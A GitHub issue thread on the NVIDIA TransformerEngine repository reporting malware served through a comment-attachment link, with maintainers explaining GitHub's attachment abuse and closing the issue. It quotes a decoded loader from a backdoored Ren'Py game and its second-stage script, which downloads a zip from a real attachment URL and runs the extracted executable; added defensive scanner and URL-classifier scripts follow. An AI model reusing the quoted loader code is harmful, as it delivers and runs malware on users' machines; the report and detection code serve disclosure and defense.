NVIDIA / TransformerEngine

A library for accelerating Transformer models on NVIDIA GPUs, including using 8-bit floating point (FP8) precision on Hopper and Ada GPUs, to provide better performance with lower memory utilization in both training and inference.
https://docs.nvidia.com/deeplearning/transformer-engine/user-guide/index.html
Apache License 2.0

[URGENT] Malware hosted somewhere in this repo #864

Closed andrei-cb closed 4 months ago

andrei-cb commented 4 months ago

Recently hit a pretty advanced-ish malware attack. The script in question was downloading a .zip file from this repository and running it on target PCs.

Link: https://github.com/NVIDIA/TransformerEngine/files/15392947/screens.txt

The .txt file is actually a .zip containing the malware.

Sandbox result: https://tria.ge/240523-2k2wtsbg8w

andrei-cb commented 4 months ago

Tagging some active contributors that might be able to find out how the file got here.

@denera @shamisp @ptrendx @phu0ngng

trodery commented 4 months ago

@andrei-cb Can you share where you found the link you reported?

andrei-cb commented 4 months ago

Found it in a backdoored renpy game.

A python downloader was hidden in the renpy LICENSE file encoded in base64 and was executed by some backdoored code. The decoded script looks like this:

```python
import os
import platform
import requests
import threading
from datetime import datetime

def loadfonts():
    # Only runs on Windows; stages the second script under %APPDATA%\RenPy\bin
    if platform.system() != "Windows":
        return
    base_dir = os.path.join(os.getenv('APPDATA'), 'RenPy', 'bin')
    if not os.path.exists(base_dir):
        os.makedirs(base_dir)
    script_path = os.path.join(base_dir, 'fontsload.py')

    url = '<malware_link_censored>'
    response = requests.get(url)
    if response.status_code == 200:
        with open(script_path, 'w') as file:
            file.write(response.text)

        try:
            # Imports the downloaded file as a module and calls its run() entry point
            from importlib import util
            spec = util.spec_from_file_location("downloaded_module", script_path)
            downloaded_module = util.module_from_spec(spec)
            spec.loader.exec_module(downloaded_module)
            if hasattr(downloaded_module, 'run'):
                downloaded_module.run()
        except Exception as e:
            pass  # any failure is swallowed silently

def screenload():
    # Entry point called from the backdoored game code; runs the loader off the main thread
    thread = threading.Thread(target=loadfonts)
    thread.start()
```

fontsload.py file looks like this:

```python
import os
import requests
import zipfile
import subprocess

def run():
    # Define the URL of the file you want to download (updated to the new ZIP file URL)
    download_url = "https://github.com/NVIDIA/DeepLearningExamples/files/15425890/screens.txt"

    # Define the path where the file will be saved and extracted
    appdata_path = os.getenv('APPDATA')
    target_directory = os.path.join(appdata_path, 'RenPy', 'bin')
    zip_file_path = os.path.join(target_directory, 'downloaded.zip')
    executable_path = os.path.join(target_directory, 'game_name.exe')

    # Ensure the target directory exists
    if not os.path.exists(target_directory):
        os.makedirs(target_directory)

    # Download the ZIP file and save it
    response = requests.get(download_url)
    if response.status_code == 200:
        with open(zip_file_path, 'wb') as file:
            file.write(response.content)
        print(f"ZIP file downloaded and saved to {zip_file_path}")

        # Extract the ZIP file
        try:
            with zipfile.ZipFile(zip_file_path, 'r') as zip_ref:
                zip_ref.extractall(target_directory)  # Using the provided password
            print("ZIP file extracted.")
        except zipfile.BadZipFile as e:
            print(f"Failed to extract ZIP file. Check if the file is a valid ZIP archive: {e}")
            return
        except RuntimeError as e:
            print(f"Password error or ZIP extraction error: {e}")
            return

        # Execute the extracted .exe file
        if os.path.exists(executable_path):
            try:
                subprocess.call([executable_path], shell=True)
                print("Executable file run successfully.")
            except Exception as e:
                print(f"Error executing the file: {e}")
        else:
            print("Executable file does not exist.")

        # Clean up the ZIP file
        os.remove(zip_file_path)
        print(f"ZIP file removed from {zip_file_path}.")

    else:
        print("Failed to download the ZIP file.")
```

This downloads the file reported above and executes it. Looks like the second script was coded with some ai assistant, lmao.

The executable from the downloaded archive is digitally signed, so I guess the malware is loaded using some kind of DLL hijacking.

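The loader above was hidden as a base64 blob inside a LICENSE text file. The following is an added detection example (not code from the issue or from the Ren'Py or TransformerEngine projects) that scans a text file for long base64 runs and flags any that decode to Python carrying the loader's tell-tale strings; the marker list and the sample license text are this example's own constructed assumptions.

```python
import base64
import binascii
import re

# Strings that, appearing together in decoded text, suggest a Python stage-loader
# of the kind shown in this issue (network fetch + dynamic module execution).
LOADER_MARKERS = (
    "import requests", "requests.get(", "spec_from_file_location",
    "exec_module(", "subprocess.", "os.getenv('APPDATA')", 'os.getenv("APPDATA")',
)

# A run of base64 alphabet (whitespace allowed) long enough to hold a script.
B64_RUN = re.compile(r"[A-Za-z0-9+/=\s]{200,}")

def decode_candidate(blob: str):
    """Strip whitespace and decode; return text, or None if not base64/UTF-8."""
    compact = re.sub(r"\s+", "", blob)
    if len(compact) % 4:
        return None
    try:
        return base64.b64decode(compact, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def scan_text_for_hidden_python(text: str):
    """Return (decoded_script, markers_hit) for every suspicious blob in text."""
    findings = []
    for m in B64_RUN.finditer(text):
        decoded = decode_candidate(m.group(0))
        if decoded is None:
            continue
        hits = [k for k in LOADER_MARKERS if k in decoded]
        if len(hits) >= 2 and "import " in decoded:
            findings.append((decoded, hits))
    return findings

# Constructed sample: a license header with a base64 blob appended. The blob is a
# harmless stand-in that only shares the loader's identifying strings.
_FAKE_LOADER = (
    "import os\nimport requests\nfrom importlib import util\n"
    "def loadfonts():\n    base = os.getenv('APPDATA')\n"
    "    spec = util.spec_from_file_location('m', base)\n"
    "    spec.loader.exec_module(util.module_from_spec(spec))\n"
)
SAMPLE_LICENSE = (
    "Copyright (c) Example Studio. Permission is hereby granted, free of charge, "
    "to any person obtaining a copy of this software.\n\n"
    + base64.b64encode(_FAKE_LOADER.encode()).decode() + "\n"
)
```

Running `scan_text_for_hidden_python` over every text file shipped with a game build (LICENSE, README, .rpy sources) turns the trick described in the comment into a cheap pre-release or incident-response check.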
TombieCat commented 4 months ago

Thanks for the information. Security team is on it.

ptrendx commented 4 months ago

@andrei-cb Thank you very much for the report. Security investigation showed that the malicious file was not part of the Transformer Engine repo itself (so our users are safe). The file was uploaded (and the link pointing to our repo was produced in order to make it look trustworthy) via the comment attachment feature of GitHub (see e.g. this article for details: https://www.bleepingcomputer.com/news/security/github-comments-abused-to-push-malware-via-microsoft-repo-urls/). We contacted GitHub and the file was removed. Closing this issue.
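The resolution turns on a distinction a reviewer can check mechanically: a `github.com/<owner>/<repo>/files/<id>/...` link is a comment attachment served under the repository's name, not a file in its history. The following is an added example (not code from the issue or the project) that classifies GitHub links by where the bytes actually live and flags the download URLs in a script that are not backed by repository content; the `user-attachments/files` path shape is assumed from GitHub's newer attachment URLs, and the sample script is constructed.

```python
import re
from urllib.parse import urlparse

def classify_github_url(url: str):
    """Return (kind, in_repo_history) for a link.

    Only 'repo_content' links are backed by commits that maintainers review;
    the other kinds are uploads that merely carry an owner/repo in their path.
    """
    p = urlparse(url)
    host = p.netloc.lower()
    parts = [s for s in p.path.split("/") if s]
    if host == "raw.githubusercontent.com":
        # owner/repo/ref/path -> content at a specific commit or branch
        return ("repo_content", True) if len(parts) >= 4 else ("other", False)
    if host != "github.com":
        return ("not_github", False)
    if parts[:2] == ["user-attachments", "files"]:
        return ("comment_attachment", False)   # newer shape, no owning repo at all
    if len(parts) >= 4 and parts[2] == "files" and parts[3].isdigit():
        return ("comment_attachment", False)   # owner/repo/files/<id>/ shape from this issue
    if len(parts) >= 4 and parts[2] in ("blob", "raw", "tree"):
        return ("repo_content", True)
    if parts[2:4] == ["releases", "download"]:
        return ("release_asset", False)        # maintainer upload, still not a commit
    return ("other", False)

URL_RE = re.compile(r"""https?://[^\s'"<>]+""")

def flag_untrusted_downloads(script_text: str):
    """List (url, kind) for each GitHub link in a script not backed by repo history."""
    flagged = []
    for url in URL_RE.findall(script_text):
        kind, in_history = classify_github_url(url)
        if kind != "not_github" and not in_history:
            flagged.append((url, kind))
    return flagged

# Constructed sample resembling the second-stage script: one attachment URL (the one
# quoted in this issue) and one assumed raw-content URL for contrast.
SAMPLE_SCRIPT = '''
download_url = "https://github.com/NVIDIA/DeepLearningExamples/files/15425890/screens.txt"
helper_url = "https://raw.githubusercontent.com/NVIDIA/TransformerEngine/main/README.md"
'''
```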